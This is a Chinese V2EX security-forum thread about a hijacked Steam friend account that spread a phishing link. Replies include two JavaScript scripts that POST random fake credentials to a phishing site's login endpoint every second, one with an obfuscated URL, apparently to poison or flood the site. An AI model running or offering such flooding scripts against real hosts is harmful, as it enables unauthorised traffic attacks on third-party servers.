steam 的好友似乎被人盗号了

2022-06-27 19:37:28 +08:00
 XiLingHost

刚才发消息说要给“CS 锦标赛”投票

然后发了个一看就是钓鱼的网站,最离谱的是这个网站似乎不走梯子上不去

https://pwexcup.com 注意,这是个钓鱼网站,请勿输入任何个人信息

有一说一,这东西做的也太粗糙了,一堆元素点不进去

1377 次点击
所在节点    信息安全
5 条回复
SunsetShimmer
2022-06-27 19:43:35 +08:00
zydxn
2022-06-27 20:01:20 +08:00
以前就见人发过

https://www.v2ex.com/t/818457
SunsetShimmer
2022-06-27 20:16:09 +08:00
function getRandomString(length) {
var text = "";
var possible = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789";
for (var i = 0; i < length; i++)
text += possible.charAt(Math.floor(Math.random() * possible.length));
return text;
}

function getRandomInt(min, max) {
return Math.floor(Math.random() * (max - min + 1)) + min;
}

function get() {
fetch("https://welcomepw.com/auth.php", {
"headers": {
"accept": "*/*",
"accept-language": "zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6",
"content-type": "application/x-www-form-urlencoded; charset=UTF-8",
"sec-ch-ua": "\" Not;A Brand\";v=\"99\", \"Microsoft Edge\";v=\"103\", \"Chromium\";v=\"103\"",
"sec-ch-ua-mobile": "?0",
"sec-ch-ua-platform": "\"Windows\"",
"sec-fetch-dest": "empty",
"sec-fetch-mode": "cors",
"sec-fetch-site": "same-origin",
"x-requested-with": "XMLHttpRequest"
},
"referrer": "填自己的",
"referrerPolicy": "strict-origin-when-cross-origin",
"body": "doAuth=1&login=" + getRandomString(getRandomInt(8, 20)) + "&password=" + getRandomString(getRandomInt(12, 30)),
"method": "POST",
"mode": "cors",
"credentials": "include"
}).then(function (response) {
return response.json();
}
).then(function (data) {
console.log(data);
}
).catch(function (error) {
console.log(error);
}
);
}

setInterval(get, 1000);
SunsetShimmer
2022-06-27 20:52:09 +08:00
function getRandomString(length) {
var text = "";
var possible = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789";
for (var i = 0; i < length; i++)
text += possible.charAt(Math.floor(Math.random() * possible.length));
return text;
}

function getRandomInt(min, max) {
return Math.floor(Math.random() * (max - min + 1)) + min;
}

function getFullURL() {
return location.protocol + "//" + location.host + location.pathname;
}

function get() {
// Rewrite with xhr
var xhr = new XMLHttpRequest();
xhr.open("POST", "https:"+"//welcomepw"+".c"+"om/auth.php", true);
xhr.setRequestHeader("accept", "*/*");
xhr.setRequestHeader("accept-language", "zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6");
xhr.setRequestHeader("content-type", "application/x-www-form-urlencoded; charset=UTF-8");
xhr.setRequestHeader("x-requested-with", "XMLHttpRequest");
xhr.onreadystatechange = function () {
if (xhr.readyState == 4 && xhr.status == 200) {
console.log(xhr.responseText);
}
}
xhr.send("doAuth=1&login=" + getRandomString(getRandomInt(8, 20)) + "&password=" + getRandomString(getRandomInt(12, 30)));
}

setInterval(get, 1000);
v2tudnew
2022-06-27 21:52:09 +08:00
密码管理器无法填充就知道有问题了。

这是一个专为移动设备优化的页面(即为了让你能够在 Google 搜索结果里秒开这个页面),如果你希望参与 V2EX 社区的讨论,你可以继续到 V2EX 上打开本讨论主题的完整版本。

https://www.v2ex.com/t/862545

V2EX 是创意工作者们的社区,是一个分享自己正在做的有趣事物、交流想法,可以遇见新朋友甚至新机会的地方。

V2EX is a community of developers, designers and creative people.

© 2021 V2EX